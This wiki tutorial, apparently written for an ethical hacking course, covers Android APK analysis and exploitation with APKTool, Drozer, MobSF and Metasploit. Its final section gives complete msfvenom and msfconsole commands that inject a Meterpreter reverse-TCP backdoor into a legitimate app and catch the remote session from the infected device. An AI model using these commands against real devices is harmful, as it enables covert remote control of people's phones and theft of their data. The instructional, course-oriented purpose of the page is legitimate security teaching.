Hands-on: Android APK Analysis and Exploitation (en)

From OnnoWiki
Revision as of 18:10, 27 October 2024 by Onnowpurbo (talk | contribs)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to navigation Jump to search

To conduct analysis and exploitation of Android APKs in an ethical hacking course, we will utilize several tools in Kali Linux 2024.3, including APKTool, Drozer, and MobSF. Here are the steps to follow:

1. Analyzing Android APK with APKTool

APKTool is used for unpacking and modifying APKs. We can use APKTool to decompile APKs and examine the application's source code, particularly the manifest file containing critical permissions.

Steps:

  • Install APKTool: Ensure APKTool is installed. If not, install it with the command:
sudo apt install apktool
  • Decompile APK: To analyze the APK, first decompile the APK file:
apktool d target_app.apk -o output_folder

This will extract the contents of the APK into the `output_folder`.

  • Analyze AndroidManifest.xml: This file contains the permissions requested by the application. Open and analyze it to check for suspicious permissions like access to SMS, storage, or location that may not be necessary.
  • Modify and Recompile APK: After modifications, the APK can be recompiled:
apktool b output_folder -o new_app.apk
  • Sign APK: After generating the new APK, sign it with a key:
jarsigner -keystore my-release-key.keystore new_app.apk alias_name

Example: Suppose the application requests SMS access without a clear reason. We can use APKTool to modify the manifest, disable the permission, and recompile the app.

2. Exploiting Application Using Drozer

Drozer is a powerful tool for exploiting Android APKs, especially for examining weaknesses in application components like activities, broadcast receivers, and content providers.

Steps:

  • Install Drozer: Install Drozer on Kali Linux.
sudo apt install drozer
  • Setup Drozer on Android Device: Install `drozer-agent.apk` on the Android device and run it to get shell access:
adb install drozer-agent.apk
adb forward tcp:31415 tcp:31415
  • Connect Drozer with Target Application: After setup, connect Drozer to the target application:
drozer console connect
  • Analyze Attack Surface: Use the following command to analyze the application’s attack surface:
run app.package.info -a com.example.targetapp
  • Exploit Vulnerable Components: If the application exposes components like an activity or content provider, we can exploit these vulnerabilities. For example, if there is a vulnerable `ContentProvider`:
run app.provider.query content://com.example.targetapp.provider

Exploitation Example: Suppose an application has a misconfigured `content provider`. Using Drozer, we can access sensitive data from the application.

3. Vulnerability Analysis of APK with MobSF

Mobile Security Framework (MobSF) is an automated tool that facilitates comprehensive APK security analysis.

Steps:

  • Install MobSF: If MobSF is not installed, use Docker to install it:
docker pull opensecurity/mobile-security-framework-mobsf
docker run -it -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest
  • Upload APK: Once MobSF is running, open a browser and go to `http://localhost:8000`. Upload the APK you wish to analyze.
  • Automated Analysis: MobSF will automatically perform a static analysis on the APK, including scanning for malicious components, improper permissions, and potential exploits.

Example: Using MobSF, we can identify common weaknesses such as *hardcoded credentials*, *insecure storage*, and *weak cryptographic implementations*.

4. Using APK to Install a Backdoor

Advanced exploitation can include installing a backdoor in an APK using Metasploit.

Steps:

  • Create Backdoor APK with Metasploit:
msfvenom -p android/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -o backdoor.apk
  • Inject Backdoor into APK:
msfvenom -x original_app.apk -p android/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -o infected_app.apk
  • Run Listener:
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST <IP>
set LPORT <PORT>
exploit
  • Run APK on Target: After the backdoor APK is installed on the target device, we can gain a Meterpreter session and remotely access the device.

Conclusion

Using a combination of tools like APKTool, Drozer, and MobSF, we can conduct in-depth analysis of Android APKs and exploit their vulnerabilities. These steps include source code analysis, attack surface testing, and exploiting vulnerable components.

Relevant Links